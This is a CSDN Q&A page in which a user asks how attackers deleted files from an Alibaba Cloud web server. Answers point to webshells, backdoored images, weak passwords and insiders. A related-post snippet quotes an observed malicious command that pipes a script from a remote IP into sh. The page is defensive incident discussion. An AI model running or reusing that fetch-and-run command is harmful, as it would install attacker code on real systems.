阿里云服务器被攻击导致被文件删除

使用阿里云部署web项目服务器(tomcat + mysql+window2014),项目刚上线没多久,就被黑客攻击,部署的项目文件全部被删除,请问大牛,能分析下黑客是通过什么途径办到的,该怎么去防护,能提供解决思路就更好了。急~

0

4个回答

不知道你是用的什么语言,如果是php一类的脚本语言,如果黑客上传一个精心构造的脚本文件,包含删除的脚本,并且在某种条件下触发执行,就可以删除你的文件。这种攻击方式叫做web shell攻击。
http://www.2cto.com/Article/201301/181654.html

不知道"window2014"是什么东西,是Windows么?微软没有发布过什么Windows 2014,也不知道你从哪里找来的,如果你的操作系统镜像是自己准备的山寨盗版,那么可能被植入后门。另外服务器本身也可能在你操作和运行的过程中感染恶意程序,甚至变成可以被操作的“肉鸡”,那么黑客直接登录服务器就可以胡作非为。

你的管理员密码是否泄露,如果你使用的密码组合太短,或者使用弱口令,那么会被黑客猜测出来。另外你一个密码在多个场合使用,也可能因为别的地方泄露而造成黑客知道你的密码。你的同事或者员工也可能恶意破坏系统,或者对系统误操作误删除,并且伪装成黑客攻击。

另外还有注入跨站攻击、脚本注入、sql注入等很多攻击方式,如果你的项目程序本身不是你开发的,那么开发者也可能加入后门。

既然你用的是阿里云的服务器,你首先要做的是电话联系他们的客服,让他们帮你排查,调出系统登录日志、数据库日志、http日志等等分析。如果攻击很严重,也应该及时报警。

4
langfei520
叶恋星空 不好意思,写错了window server 2012 版
3 年多之前 回复

楼上正解,window2014感觉很牛逼。。

0

window2014完全没听过。。。

0

应该还有其他人有登陆权限,或者你的账号密码泄露了。这种问题一看就是恶意删除,黑客或病毒一般不会恶意删除文件吧。

0
Csdn user default icon
上传中...
上传图片
插入图片
抄袭、复制答案,以达到刷声望分或其他目的的行为,在CSDN问答是严格禁止的,一经发现立刻封号。是时候展现真正的技术了!
其他相关推荐
记一次阿里云上Redis服务器被入侵的经历
欢迎使用Markdown编辑器写博客本Markdown编辑器使用StackEdit修改而来,用它写博客,将会带来全新的体验哦: Markdown和扩展Markdown简洁的语法 代码块高亮 图片链接和图片上传 LaTex数学公式 UML序列图和流程图 离线写博客 导入导出Markdown文件 丰富的快捷键 快捷键 加粗 Ctrl + B 斜体 Ctrl + I 引用 Ctrl
记录一次阿里云服务器被挖矿木马攻击后的处理
周末收到阿里云异常登录的短信提醒,没有理会,周一上线看了眼,cpu占用100%,发现被攻击了。 先修改管理员的登录密码 1.查看top进程    发现一个进程qW3xT.3进程占用99.9%的cpu 百度下明显是挖矿病毒程序 kill -9 端口号 杀死之后,会发现一会又启动了 观察top发现有一个守护进程ddgs.3014先启动,然后隐藏 2.查看ddgs进程并杀掉  ps -aux|gr...
记一次服务器被攻击的历史 你的应用服务器是tomcat么?那你得注意下了
这些天我的tomcat目录下莫名其妙的多了个war文件,里面内容只有一个index.jsp, 当时很疑惑,谁传上去的?能控制服务器权限的团队里就我和nick,都没传过。 出于好奇,我把这个jsp弄到了我本地,一看内容,哇塞,天哪,这是个资源管理器的功能,能控制机器上所有文件操作。显然,被入侵了   幸好还没有杯具,我们也有一招,虽然war被弄在webapp下了,可是入侵者无法访问这个url呵呵...
阿里云服务器因为Redis漏洞收到攻击解决方案
由于Redis监听在公网,并且没有进行认证,所以很容易被黑客侵入。参照几篇博客。 http://blog.jobbole.com/94518/ https://blog.csdn.net/tjcyjd/article/details/54140321 https://blog.csdn.net/hu_wen/article/details/51908597 https://blog.csd...
阿里云服务器如何做好网站安全防护,防止被黑客攻击
一、为什么黑客会攻击我? 从最近我收到的很多站长反馈以及我主动去了解的情况来看,相当一部分站长对于自己网站被黑表示非常的不理解,觉得自己的网站不大,弄得又不怎么的,怎么就被黑客盯上了,并挂上了黑链。然后开始怀疑自己是不是表现得太高调了,是不是长得太帅了遭到妒忌了等等。 首先,我非常肯定的告诉大家,黑客攻击绝对不会因为你长得太帅了。从目前的趋势来看,黑客攻击的范围真正是全网段。黑客利用工具对全网的网...
重磅-记一次惊心动魄的阿里云服务器被入侵过程定位
现象 某天登陆自己的阿里云服务器,发现有很多命名奇怪的进程:  定位步骤一:查看进程文件位置 通过命令 ll /proc/pid 查看进程文件exe执行路径,打开后整个人都惊呆了!mysql目录和mysql/data目录多了很多奇怪的so文件和可执行文件: 定位步骤二:立马kill掉进程和文件 批量kill进程:介绍一个在stackoverfl
redis 安全漏洞导致服务器被攻击
近日发现redis数据无故被清,恢复后连续几次还是被清,由于经验不足,一直认为是自己配置有误。经过多天查找,才发现2015年11月份爆发了redis安全漏洞攻击事件,一一印证了下,全部中招。 特点: 1.redis缓存被清0;而且每天会执行一次; 2./root/.ssh/ 下多了几个文件。dump.rdb, foo.txt, authorized_keys里多了莫名
记一次服务器被挖矿程序攻击解决
这两天先后收到阿里云的两条短信,一次提示有挖矿程序;一次提示服务器上的crontab被改了。中间隔了1天。刚开始我还没有引起注意,看到有挖矿程序的时候,用top查看到有mined的进程,就直接kill掉了,后来又遇到的时候,发现不对啊,有两个特别占cpu的进程,分别是qW3xT.2和ddgs.3013。确定是挖矿进程无疑了。   1.使用top查看占用cpu高的进程,发现qW3xT.2占用将近...
记录阿里云服务器mysql被黑
前言 比上次服务器被黑还要恐怖的数据库被黑,再次强调,数据库不备份不做安全,你就可以准备跑路了。 这次记录一下整个被黑的过程,以及整个检查和处理的过程。 发现 上个月某一天,网站出现了无法登录的情况,出现了大量的错误日志报警,然后就牛逼了,上服务器一查发现数据库里面就剩了一个名叫PLEASE_READ的数据库,里面留下了一张表,然后留下了比特币的地址,说24小时不转账就删数据库备份。 马...
阿里云服务器防攻击
之前阿里云服务器被攻击的经历太悲惨了,因为中病毒导致只能初始化到购买时状态什么的也是呵呵了。 阿里云技术人员建议安装个杀毒软件来着,今天有前辈就跟我推荐了“安全狗” 网址是http://www.safedog.cn/,我下了个服务器安全狗,听说挺不错的,免费的而且有教程,mark一下
公司服务器被攻破后的处理
公司的两台服务器被攻击了,不停地向外发送ddos攻击,需要我马上处理。首先ssh登陆服务器,发展它响应特别慢。几乎没有办法通过ssh客户端操作服务器,登陆阿里云网页控制端,终于可以正常执行发送的命令了。 首先尝试了将占用cpu比较高的那个进程杀死,但是没有用,过一会就继续会起来一个其他的进程来不停地发包。从网上搜索了一下(http://www.ipastimes.com/post/86.ht
解决阿里云服务器ECS遭到攻击方法:GET和攻击类型:SSH暴力破解
一 攻击方法:GET 方法:修改nginx配置 # vim nginx.conf 二 攻击类型:SSH暴力破解 方法:直接设置安全组,修改ssh默认端口,限制ip访问ssh端口(设置白名单),再改防火墙. 注意两个电脑在使用同一WiFi的情况下,连接服务器,所查看到的ip是一样的. 测试是否配置成功:手机开热点,一台电脑连接手机,再去登录,若不可以登录,证明配置成功 安全管控设置白名单 ...
阿里云控制台天天提示有攻击
想必很多人用了 ECS,开放了80/443端口放置网站之后,都会发现这个问题。于是很多人骂:是不是阿里云这是在向我推荐购买他家安全产品?答案:是。但是只考虑是,就不够理性了,因为忽略了一些非常现实的基本问题。 公网环境本来就是很恶劣的,举例: 1,早在互联网初期,就已经有技术牛人(约等于黑客)为了获取某些资源,制作出扫描类软件工具。然后遍历...
阿里云服务器被挖矿问题
下午发现服务器CPU: 12618 root      20   0  680m  17m 1280 S 699.9  0.1  72:13.24 wnTKYg  网上收索解决办法copy如下: 下面就讲解wnTKYg如何清除。最近项目在做性能测试,发现CPU使用率异常,无人访问时CPU也一直保持75%,然后在xShell上top了一下,发现wnTKYg这个程序CPU占用率3
记录阿里云被肉鸡的破解方法
5.19号收到阿里云的短信提醒:尊敬的用户,您的云服务器(xxx.xxx.xxx.xxx)存在对外ddos攻击,或已被入侵,会造成您的服务器宕机或者数据泄露。xxxxxxx 5.19号当天我登录服务器查看可疑进程,没有所获。更改了云服务器的密码,包含了大小写,特殊字符 5.20号又收到短信提醒,和5.19号短信一样,仍然存在入侵。 登录阿里云,查看cpu使用率为100%,ps
自己的阿里云服务器被人黑了一种挖矿病毒,解决方法如下:
有如下的异常日志任务 解决方案:kerberrods 个人感悟 以前一直是认为运维的任务只是做一些服务器的管理和维护,可能和安全并没有多大的交集,但是突然发现当自己的服务器被黑了之后,才感觉安全的重要性。 我记得有次答辩上,有人说云服务器的技术已经很成熟了,所以我们可以通过云服务器的管理商来对我们的服务器进行一些防护。但是通过这次经历,我承认云服务的提供商确实很强大,因为我这次也是通过阿里云的云...
阿里云ECS服务器被DDoS无解,请问我该何去何从?
阿里云ECS服务器被DDoS无解,请问我该何去何从?
阿里云centos环境之被木马攻击的一次记录<持续观察中>
阿里云centos环境之被木马攻击的一次记录 1.背景 阿里云上ECS服务器上每天23点在tomcat/webapps都会自动下载下mydata.war,可以确定的是mydata.war是个木马,虽然删除但还是会定时下载 2.定时任务 首先想到的是定时任务命令crontab,crontab命令的功能是在一定的时间间隔调度一些命令的执行 查看文件/etc/crontab vi /et
这两周服务器被攻击,封锁了600多个IP地址段后今天服务器安静多了
这两周服务器被攻击,封锁了600多个IP地址段后今天服务器安静多了 建议大家在自己的服务器上也封杀这些瘪三的地址 iptables -I INPUT -s 123.44.55.0/24 -j DROP        iptables -I INPUT -s 58.217.166.0/24 -j DROP iptables -I INPUT -s 5.101.40.0/24 -j DRO
阿里云ECS遭挖矿程序攻击解决方法(彻底清除挖矿程序,顺便下载了挖矿程序的脚本)
一:杀死挖矿程序进程 在服务器上使用top指令查看cpu的使用情况,发现有一个叫java的程序占用cpu高达99.9% PID USER PR NI VIRT RES SHR S %CPU %MEM TIME+ COMMAND 5778 root 20 0 ...
记一次阿里云黑客攻击事件
这几天服务器一直发生异常行为,阿里云报警如下:根据执行命令:/bin/sh -c curl -fsSL http://165.225.157.157:8000/i.sh | sh 可知道,后台某个进程一直从这个美国的IP地址下载sh可执行文件访问这个地址:http://165.225.157.157:8000/i.sh看到执行语句如下:大概明白,意思是定时从这个地址获取sh可执行文件,然后添加到定...
记一次阿里云esc实例被黑客利用redis默认端口6379入侵变成肉鸡的悲惨经历
首先声明:因为刚入手实例,网站还在申请中。故只是搭建个redis集群供远程测试调用方便而已。因为机器上并没有项目和其他东西,为了方便redis使用的默认端口。最重要的是:配置文件中bind:标签并没有绑定ip,并且redis访问设置并没有设置密码,这就是悲剧的开始。        4月10号阿里云发邮件称服务器实例通过6379端口向外发出ddos攻击,我心里猜测应该就是通过redis被黑了。登录实...
阿里云服务器被挖矿 qW3xT.2
阿里云服务器被挖矿,造成服务器CUP爆满 原因分析:阿里云服务器端口连接使用的是0.0.0.0/0.所有地址都可以在其他阿里云服务器上远程连接这个端口,redis使用默认端口。   解决:1、修改redis默认端口           2、用last查看登录系统的用户中是否有非自己创建的用户,有就禁止其远程登录           3、find / -name qW3xT.2 查找这...
阿里云Linux系统被攻击的处理过程
  4-22日 19:48分,在等女儿跳舞下课的时候,在“多看”进入大刘等人的《毁灭之城:地球碎块》,读到了“诅咒 3.0”病毒出现的时候,阿里云发来短信“尊敬的用户,您的云服务器x.x.x.x存在对外DDOS攻击,请您务必尽快参考云账号邮箱中邮件进行处理,逾期将关停云服务器【阿里云】”。用“gmail”打开邮件,没有太多有用的内容:“经检测您的云服务器(x.x.x.x)存在恶意发包行为,需要您尽...
客户服务器被 ddos 攻击,应该怎么办?
客户服务器被 ddos 攻击,应该怎么办?
web遭到攻击、导致tomcat停止服务
       最近一个项目遭到恶意攻击、导致用户无法访问系统、apache 出现下面错误: Apache出错:503 Service Temporarily Unavailable       跟踪apache日志发现,攻击者会post很大的内容到服务端,带宽都被占用完了。           为了尽快恢复系统正常使用,我们采取了如下措施:       将攻击的页面引导至静态页面、这...
redis漏洞被攻击
redis在无密码 且无bind情况下 黑客可以拿到root凌晨四点 服务器被攻击 之后服务器内存一直被udevs占满,疑似挖矿进程,删除会自动恢复去掉执行权限 chmod -x 后 杀掉进程 服务器正常...
服务器经常被攻击
原因:部署在服务器上的网站最近经常访问不了,客户端也连接不上服务器。服务器是托管在电信机房,机房管理员给我的答复是服务器处于宕机状态。 分析:因为是对服务器或者某个网站不断访问,才导致服务器宕机,查看安全狗服务器软件,发现一个ddos攻击1433端口,如果一直被攻击了,严重影响公司业务 措施:扫描整个服务器文件查杀病毒,排查哪个网站受到攻击,关闭1433端口。限制电脑登录服务器,只有这
网站遭受攻击,cpu瞬间100%,负载好几百。解决办法
思路1. 查看当前服务器正在运行哪些服务,是否有不需要运行的服务,有可能这种服务漏洞,导致攻击2. 查看是否有异常的进程3. 查看带宽使用情况,如果是流量攻击,一般伴随资源的消耗4. 查看数据库,链接数,及是否有慢查询5. 查看web访问日志,看是否有大量的相似IP请求,如果有写一段脚本,过滤掉这一段时间的IP,再观察服务器情况...
服务器貌似被攻击,这个是正常的还是非正常的~~~
  还有 问一下,我的远程界面只需要输入ip 即可打开服务器的登录界面,这是怎么回事,完全不需要账号密码,就可以访问到我的服务器界面~~只不过界面要另外输账号密码才能正式访问...
解决阿里云服务器CUP爆满被用来当挖矿机(中病毒解决)
1. 发现cup爆满当我部署项目时启动不了,tomcat启动不了,然后我发现cup爆满,然后查看用top查看进程然后我再查看pstree进程树2.杀死进程kill -9  pid  杀死进程suppoie 进程后,过一分钟该进程又起来了3. 查找源文件杀死进程又起来,肯定是有源文件在远程调用其他远程文件植入病毒,查询源文件find  / -name '*suppoie*'查找到了文件 在 /var...
阿里云服务器被挖矿minerd入侵的解决办法
上周末,更新易云盘的时候,发现阿里云服务器CPU很高,执行 top 一看,有个进程minerd尽然占用了90%多的CPU, 赶紧百度一下,查到几篇文章都有人遇到同样问题 Hu_Wen遇到的和我最相似,下边是他的解决办法 http://blog.csdn.net/hu_wen/article/details/51908597 但我去查看启动的服务,尽然没有 lady 这个服务。 找
防止服务器攻击方法
对策:1:停止运行不需要的软件2:定期实施漏洞防范措施3:对不需要对外公开的端口或者服务加以访问限制,     通过端口扫描确认各端口服务状态(工具:Nmap(windows版))4:提高认证强度(https,实名认证,数据加的密码MD5加密)一:关于弱口令1:密码必段要有条件限制,如数字+字母+特殊字符2:密码输入次数必须要有限制,如:输入3次不成功,禁N小时,输入5次不成功,禁一天3:登陆之前...
服务器被攻击方式及防御措施?
主流的服务器攻击方式有多种手段,但是唯独DDoS攻击、CC攻击以及ARP欺骗,这些攻击方式被称为三大攻击手段,不仅可以致使服务器瘫痪,而且还很无解。 DDOS攻击 DDoS攻击全名叫做分布式拒绝服务(DDoS:Distributed Denial of Service),攻击者往往将多个计算机平台联合起来对同一个目标或者多个目标进行攻击,攻击所造成的后果也因此而严重程度不同。 DDoS攻...
阿里云服务器由于被检测到对外攻击,已阻断该服务器对其它服务器端口的访问
纪念下第一次公网服务器被攻击
140.205.225.200 - - [29/Jun/2017:14:17:21 +0800] "GET / HTTP/1.1" 200 26606 140.205.225.200 - - [29/Jun/2017:14:17:21 +0800] "GET /wp-json/wp/v2/posts HTTP/1.1" 404 949 140.205.225.200 - - [29/Jun/201
受到CC攻击有哪些症状?
当网站被CC攻击时,受到不同类型的攻击都会有不同的症状表现,通过对应的症状,就能大致分辨出攻击的类型,从而对症下药防御攻击。   症状一:服务器能正常连接到,但是网站打不开   服务器能正常连接到就排除了被大流量CC攻击的可能,这个时候可以查看下服务器的任务管理器,查看服务器的CPU占用和网络带宽占用:   如果是w3wp.exe进程大量占用CPU,就可以马上确定是被CC攻击了,这个
阿里云服务器养只大虫子:Redis漏洞挖矿造成CPU100%的解决办法
之前在9月份的时候,我的阿里云服务器出现过一次被挖矿的情况,也是cpu爆满,后来发现是因为mysql的漏洞。 当时抓着mysql一顿处理,新建用户,强密码,设权限,nologin,可算是正常了。 这几天又再次出现了被挖矿的情况,今天算是解决了,舒服,下面说下情况。 表现:服务器上的web应用一场的慢,ssh登陆进去top -c查看如下: COMMAN处的[UWcUml]占用cpu100...
解决服务器满CPU被当矿机问题
    最近服务器碰到反应速度变慢问题。一看进程,有个进程名字为乱码的9-10位英文的进程(例如rrgjpvryri),一直在满CPU在跑。并且启动方式是绑定基本的系统指令(例如top,ls等指令)启动的。      并且不断kill之后,过一小段时间又会产生一个新的另一个名字的进程继续跑。在网上查找了一些资料,发现是自己的服务器中了病毒,被别人当成矿机在挖bitcoin了。     解决问题的方...
记一次服务器被攻击经历
    从接手公司服务器两个半星期经常性的无法正常ssh登陆,十次里面有九次半都是显示 ssh_exchange_identification:read:connection reset by peer     也谷歌很多种原因和解决方案,无非是分两种:一是线程满了,需要更改配置文件把max-session 调大;二则是访问频率太高被服务器列入黑名单了。也跟微软azure那边联系过,一开始推测是因...
文章热词 机器学习教程 Objective-C培训 交互设计视频教程 颜色模型 设计制作学习
相关热词 mysql关联查询两次本表 native底部 react extjs glyph 图标 被nlp课程洗脑 区块链培训被坑